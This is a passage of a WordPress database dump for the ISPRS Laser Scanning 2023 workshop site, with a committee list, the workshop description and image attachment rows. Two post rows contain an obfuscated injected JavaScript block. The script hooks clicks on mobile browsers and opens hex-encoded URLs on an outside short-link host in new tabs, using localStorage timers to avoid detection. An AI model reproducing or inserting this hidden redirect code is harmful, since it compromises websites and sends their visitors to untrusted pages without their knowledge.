style=\"font-weight: 400;\">David Belton (Curtin University, Australia)</p>\n<p style=\"font-weight: 400;\">David Griffiths (Apple, US)</p>\n<p style=\"font-weight: 400;\">Dong Zhen (Wuhan University, China)</p>\n<p style=\"font-weight: 400;\">Fabio Panella (Arup, UK)</p>\n<p style=\"font-weight: 400;\">Fabio Menna (Bruno Kessler Foundation, Italy)</p>\n<p style=\"font-weight: 400;\">Florent Poux (University of Liège, Belgium)</p>\n<p style=\"font-weight: 400;\">Francesco Pirotti (University of Padova, Italy)</p>\n<p style=\"font-weight: 400;\">Franz Rottensteiner (Leibniz Universität Hannover, Germany)</p>\n<p style=\"font-weight: 400;\">Gottfried Mandlburger (TU Wien, Germany)</p>\n<p style=\"font-weight: 400;\">Hai Huang (Universität der Bundeswehr München, Germany)</p>\n<p style=\"font-weight: 400;\">Kourosh Khoshelham (University of Melbourne, Australia)</p>\n<p style=\"font-weight: 400;\">Luigi Barazzetti (Politechnic University of Milan, Italy)</p>\n<p style=\"font-weight: 400;\">Lukas Winiwarter (University of British Columbia, Canada)</p>\n<p style=\"font-weight: 400;\">Marcus Hebel (Fraunhofer IOSB, Germany)</p>\n<p style=\"font-weight: 400;\">Markus Gerke (TU Braunschweig, Germany)</p>\n<p style=\"font-weight: 400;\">Mat Disney (UCL, United Kingdom)</p>\n<p style=\"font-weight: 400;\">Michael Olsen (Oregon State University, USA)</p>\n<p style=\"font-weight: 400;\">Monica Herrero-Huerta (University of Salamanca, Spain)</p>\n<p style=\"font-weight: 400;\">Norbert Haala (University of Stuttgart, Germany)</p>\n<p style=\"font-weight: 400;\">Roderik Lindenbergh (TU Delft, Netherlands)</p>\n<p style=\"font-weight: 400;\">Sander Oude Elberink (ITC – University of Twente, Netherlands)</p>\n<p style=\"font-weight: 400;\">Sanna Kaasalainen (Finnish Geospatial Research Institute)</p>\n<p style=\"font-weight: 400;\">Thomas Zieher (Austrian Academy of Sciences)</p>\n<p style=\"font-weight: 400;\">Tomohiro Mizoguchi (Nihon University, Japan)</p>\n<p style=\"font-weight: 400;\">Volker Wichmann (Laserdata GmbH, Austria)</p>\n<p style=\"font-weight: 400;\">Wei Yao (Hong Kong Polytechnic University, Hong Kong)</p>\n<p style=\"font-weight: 400;\">Wen Xiao (China University of Geosciences, China)</p>\n<p style=\"font-weight: 400;\">Xinlian Liang (Finnish Geospatial Research Institute, Finland)</p>\n<p style=\"font-weight: 400;\">Yusheng Xu (TU Munich, Germany)</p>\n<p style=\"font-weight: 400;\">Zsofia Koma (Aarhus University, Denmark)</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: blue;\"><u>Supporting ISPRS Working Groups:</u></h5>\n<ul>\n<li>WG II/2 Point cloud acquisition and processing</li>\n</ul>\n<p><u> </u>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Laser Scanning 2023</strong>','','publish','closed','closed','','laser-scanning-2023','','','2023-03-26 02:20:24','2023-03-26 02:20:24','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=2949',0,'dt_portfolio','',0),
(2950,1,'2022-11-02 15:05:50','2022-11-02 15:05:50','','m171','','inherit','open','closed','','m171','','','2022-11-02 15:05:50','2022-11-02 15:05:50','',2949,'https://gsw2023.com/wp-content/uploads/2022/11/m171.jpg',0,'attachment','image/jpeg',0),
(2951,1,'2022-11-02 15:08:47','2022-11-02 15:08:47','','<strong>Laser Scanning 2023</strong>','','inherit','closed','closed','','2949-revision-v1','','','2022-11-02 15:08:47','2022-11-02 15:08:47','',2949,'https://gsw2023.com/?p=2951',0,'revision','',0),
(2952,1,'2022-11-02 15:33:16','2022-11-02 15:33:16','<br />\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Laser Scanning 2023</strong>','','inherit','closed','closed','','2949-revision-v1','','','2022-11-02 15:33:16','2022-11-02 15:33:16','',2949,'https://gsw2023.com/?p=2952',0,'revision','',0),
(2953,1,'2022-11-02 15:47:30','2022-11-02 15:47:30','','m174','','inherit','open','closed','','m174','','','2022-11-02 15:49:18','2022-11-02 15:49:18','',2949,'https://gsw2023.com/wp-content/uploads/2022/11/m174.jpg',0,'attachment','image/jpeg',0),
(2954,1,'2022-11-02 15:54:01','2022-11-02 15:54:01','','m173','','inherit','open','closed','','m173','','','2022-11-02 15:54:01','2022-11-02 15:54:01','',2949,'https://gsw2023.com/wp-content/uploads/2022/11/m173.jpg',0,'attachment','image/jpeg',0),
(2955,1,'2022-11-02 16:02:54','2022-11-02 16:02:54','','m172','','inherit','open','closed','','m172','','','2022-11-02 16:02:54','2022-11-02 16:02:54','',2949,'https://gsw2023.com/wp-content/uploads/2022/11/m172.jpg',0,'attachment','image/jpeg',0),
(2956,1,'2022-11-02 16:10:50','2022-11-02 16:10:50','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2954\" img_size=\"1600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Laser scanning 2023 is the 12th of a series of ISPRS workshops covering various aspects of space-borne, airborne, mobile and terrestrial laser scanning in， indoor, underground and outdoor environments. The workshop brings together experts who focus on processing and using point cloud data acquired from laser scanners and other active 3D imaging systems, such as range cameras and gaming sensors including terrestrial, mobile, aerial, unoccupied aerial and space-borne sensing platforms. Topics include all aspects related to sensor calibration, data acquisition and data processing including notably registration, feature extraction, classification, segmentation, object detection, big data processing, data fusion, 3D modelling, BIM and change analysis. The workshop will be part of the ISPRS Geospatial Week 2023 and in Cairo, Egypt in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions. </strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"2953\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2950\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2955\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: 